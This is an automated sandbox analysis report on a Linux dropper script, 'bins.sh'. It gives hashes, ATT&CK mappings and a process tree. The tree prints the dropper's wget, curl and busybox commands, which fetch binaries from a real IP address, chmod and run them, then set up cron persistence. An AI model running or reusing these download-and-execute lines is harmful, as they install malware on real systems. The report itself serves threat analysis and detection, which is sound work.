6635e19968c3d0cdf14b07796a656dfe56415c8586c44aa8e509c937b5245b32

Analysis

max time kernel
150s
max time network
151s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
25-11-2024 12:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

a11f92e48c1efd2e63aed95cbe04af94
SHA1

c2de2f9e256ef84ee067c9211d373059fed96d1b
SHA256

6635e19968c3d0cdf14b07796a656dfe56415c8586c44aa8e509c937b5245b32
SHA512

78df94801ccc2831ce184b9de6a62ea70331f41cfcd9f7b112900401710d5623f4c862a1e52859316e626b608feed0c5d79fd2377d3ac8a12c2563c8365a572a
SSDEEP

192:JIc+rDhaJ8N5Lyyp1p/bLZ1Ic+rDK1peN5Lyy+G:6aJM1p/blR1pa

Score

9^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Contacts a large (2103) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmod

pid process

679 chmod
717 chmod

pid	process
679	chmod
717	chmod

Executes dropped EXE 2 IoCs

Processes:

RSZNe8hT3d8M51A2WrCPFJSS6EKGy4HXATYhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm

ioc	pid	process
/tmp/RSZNe8hT3d8M51A2WrCPFJSS6EKGy4HXAT	681	RSZNe8hT3d8M51A2WrCPFJSS6EKGy4HXAT
/tmp/YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm	719	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm

Renames itself 1 IoCs

Processes:

YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm

pid process

720 YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.P6dv50 crontab
Enumerates running processes
Discovers information about currently running processes on the system
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

curlcurl

description ioc process

File opened for reading /proc/cpuinfo curl
File opened for reading /proc/cpuinfo curl

pid	process
720	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.P6dv50	crontab

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnmcurlcurlcrontab

description	ioc	process
File opened for reading	/proc/295/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/810/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/899/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1032/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1099/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/742/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/788/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/908/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/987/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/998/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/822/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/937/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/940/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1041/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/2/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/923/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/942/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/27/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/801/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/999/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/804/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/896/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1093/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1131/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1133/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/26/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/756/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1044/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1064/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/882/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1021/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1067/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1089/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/924/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/981/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1083/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/781/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/832/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1057/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1078/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/868/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/875/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/594/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/876/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/893/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/972/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/4/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/909/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1010/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1095/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/768/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/776/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/959/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/794/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/934/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1054/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1076/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/1092/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/5/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
File opened for reading	/proc/579/cmdline	YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlbusyboxwgetcurlbusyboxwget

description	ioc	process
File opened for modification	/tmp/RSZNe8hT3d8M51A2WrCPFJSS6EKGy4HXAT	curl
File opened for modification	/tmp/RSZNe8hT3d8M51A2WrCPFJSS6EKGy4HXAT	busybox
File opened for modification	/tmp/YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm	wget
File opened for modification	/tmp/YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm	curl
File opened for modification	/tmp/YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm	busybox
File opened for modification	/tmp/RSZNe8hT3d8M51A2WrCPFJSS6EKGy4HXAT	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:646
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:648
- /usr/bin/wget
  wget http://216.126.231.240/bins/RSZNe8hT3d8M51A2WrCPFJSS6EKGy4HXAT
  2⤵
  - Writes file to tmp directory
  PID:650
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/RSZNe8hT3d8M51A2WrCPFJSS6EKGy4HXAT
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:675
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/RSZNe8hT3d8M51A2WrCPFJSS6EKGy4HXAT
  2⤵
  - Writes file to tmp directory
  PID:678
- /bin/chmod
  chmod 777 RSZNe8hT3d8M51A2WrCPFJSS6EKGy4HXAT
  2⤵
  - File and Directory Permissions Modification
  PID:679
- /tmp/RSZNe8hT3d8M51A2WrCPFJSS6EKGy4HXAT
  ./RSZNe8hT3d8M51A2WrCPFJSS6EKGy4HXAT
  2⤵
  - Executes dropped EXE
  PID:681
- /bin/rm
  rm RSZNe8hT3d8M51A2WrCPFJSS6EKGy4HXAT
  2⤵
  PID:684
- /usr/bin/wget
  wget http://216.126.231.240/bins/YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
  2⤵
  - Writes file to tmp directory
  PID:685
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:697
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
  2⤵
  - Writes file to tmp directory
  PID:710
- /bin/chmod
  chmod 777 YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
  2⤵
  - File and Directory Permissions Modification
  PID:717
- /tmp/YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
  ./YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:719
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:721
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:722
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:724
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      Reads runtime system information
      PID:725
- /bin/rm
  rm YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm
  2⤵
  PID:739
- /usr/bin/wget
  wget http://216.126.231.240/bins/oTkzu84t0klLNhcw6AxXnEYCYWePAgZObx
  2⤵
  PID:742

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/RSZNe8hT3d8M51A2WrCPFJSS6EKGy4HXAT

Filesize
99KB

MD5
9438d9bc392bcf300a5583b6df5bc8f6

SHA1
375a6ae34b516f6f3eeea8030c4084f585017efa

SHA256
68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

SHA512
1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Download Submit
/tmp/YhRQ9UOUOd98ZMXEym5W1u4dU72nZ2Yqnm

Filesize
177KB

MD5
786d75a158fe731feca3880f436082c0

SHA1
79ea2734e43d00cdeabed5586b2c1994d02aef3e

SHA256
5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

SHA512
7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

Download Submit
/var/spool/cron/crontabs/tmp.P6dv50

Filesize
210B

MD5
a0299a8d85d15af8ace8b93dcdac048d

SHA1
68ef37e60351ae51b196979c59aebba8f2b47514

SHA256
e5f53e08450eedb4450601cc8eb813fa633b9140565867632a1c49a378919c6a

SHA512
51af878b46f85cb7acb5bf4c2ed4376acb313a5387b29c8827d32559f7bbb94fda15e841fe25e428d909dc747d24789dd7769833a3fd73735cc7dc20fba5b19c

Download Submit